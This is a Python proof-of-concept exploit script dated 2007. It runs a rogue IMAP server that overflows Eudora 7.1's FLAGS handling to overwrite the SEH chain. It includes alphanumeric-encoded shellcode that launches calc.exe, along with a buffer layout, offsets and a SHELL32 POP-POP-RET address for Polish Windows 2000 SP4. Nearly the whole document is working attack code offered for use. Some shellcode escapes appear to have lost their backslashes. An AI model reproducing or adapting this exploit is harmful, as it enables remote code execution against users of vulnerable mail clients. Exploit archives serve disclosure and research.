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Posted on 31 May 2007

#!/usr/bin/python # Eudora 7.1 (IMAP FLAGS) 0day Remote SEH Overwrite PoC Exploit # Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl> # Tested on Eudora / 2k SP4 Polish # Shellcode type: Windows Execute Command (calc.exe) # Details:.. # Eudora --> SELECT IMBOX ---------> IMAP server # Eudora <-- FLAGS (..AAAA...) <---- IMAP server # FLAGS (Answered Flagged Draft Deleted Seen hasatt + "A" * 1070 # 0x41414141 Pointer to next SEH record # 0x41414141 SE handler ## from thread import start_new_thread from struct import pack from string import find from time import sleep from socket import * session_elements = ( '* OK IMAP4 ready ', '* CAPABILITY IMAP4 IMAP4rev1 ACL QUOTA LITERAL+ MAILBOX-REFERRALS NAMESPACE UIDP' 'LUS ID NO_ATOMIC_RENAME UNSELECT CHILDREN MULTIAPPEND BINARY SORT THREAD=ORDERED' 'SUBJECT THREAD=REFERENCES ANNOTATEMORE IDLE SASL-IR ' '00000 OK completed ', '00001 OK User logged in ', '* NAMESPACE (("INBOX." ".")) (("user." ".")) (("" ".")) ' '00002 OK Completed ', '* LIST (Noselect) "." "" ' '00003 OK Completed (0.000 secs 0 calls) ', '* LIST (HasChildren) "." "INBOX" ' '00004 OK Completed (0.000 secs 3 calls) ', '* LIST (HasChildren) "." "INBOX" ' '00005 OK Completed (0.000 secs 3 calls) ', '* FLAGS (Answered Flagged Draft Deleted Seen hasatt%s) ' '* OK [PERMANENTFLAGS (Answered Flagged Draft Deleted Seen hasatt *)] ' '* 1 EXISTS ' '* 0 RECENT ' '* OK [UIDVALIDITY 1180222864] ' '* OK [UIDNEXT 2] ' '* OK [NOMODSEQ] Sorry, modsequences have not been enabled on this mailbox ' '* OK [URLMECH INTERNAL] ' '00003 OK [READ-WRITE] Completed ') shellcode = ( # Restricted Characters: 0x0a, 0x0d, 0x20, 0x29, (0x60 .. 0x7B) # EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44" "x42x30x42x50x42x50x4bx58x45x44x4ex33x4bx48x4ex57" "x45x50x4ax57x41x30x4fx4ex4bx38x4fx34x4ax31x4bx58" "x4fx35x42x32x41x50x4bx4ex49x54x4bx38x46x43x4bx58" "x41x50x50x4ex41x53x42x4cx49x49x4ex4ax46x58x42x4c" "x46x57x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e" "x46x4fx4bx53x46x35x46x42x46x30x45x57x45x4ex4bx38" "x4fx45x46x52x41x50x4bx4ex48x56x4bx48x4ex50x4bx54" "x4bx48x4fx45x4ex51x41x30x4bx4ex4bx58x4ex51x4bx48" "x41x50x4bx4ex49x58x4ex55x46x52x46x50x43x4cx41x53" "x42x4cx46x56x4bx38x42x34x42x33x45x38x42x4cx4ax47" "x4ex50x4bx38x42x44x4ex50x4bx38x42x47x4ex41x4dx4a" "x4bx48x4ax56x4ax30x4bx4ex49x30x4bx48x42x48x42x4b" "x42x50x42x30x42x50x4bx38x4ax36x4ex43x4fx35x41x43" "x48x4fx42x56x48x55x49x58x4ax4fx43x38x42x4cx4bx57" "x42x35x4ax56x42x4fx4cx48x46x50x4fx45x4ax56x4ax49" "x50x4fx4cx38x50x30x47x55x4fx4fx47x4ex43x46x41x36" "x4ex36x43x36x42x50x5a") NEXT_SEH_RECORD = 0x909006EB # JMP SHORT + 0x06 SE_HANDLER = 0x7CEA41D3 # POP POP RET (SHELL32.DLL / 2k SP4 Polish) buf = "A" * 1062 buf += pack("<L", NEXT_SEH_RECORD) buf += pack("<L", SE_HANDLER) buf += "x90" * 32 buf += shellcode def AcceptConnect(cl, addr): print "Connection accepted from: %s" % (addr[0]) try: for i in range(0, len(session_elements) - 1): cl.send(session_elements[i]) response = cl.recv(256) retval = find(response, 'SELECT INBOX') if(retval != -1): cl.send(session_elements[7] % (buf)) sleep(1) print "Done" break cl.close() except Exception, err: print err bind_addr = '' bind_port = 143 s = socket(AF_INET, SOCK_STREAM) s.bind((bind_addr, bind_port)) s.listen(1) print "Listening on %s:%d..." % (bind_addr, bind_port) while(1): cl, addr = s.accept() start_new_thread(AcceptConnect, (cl, addr,)) # EoF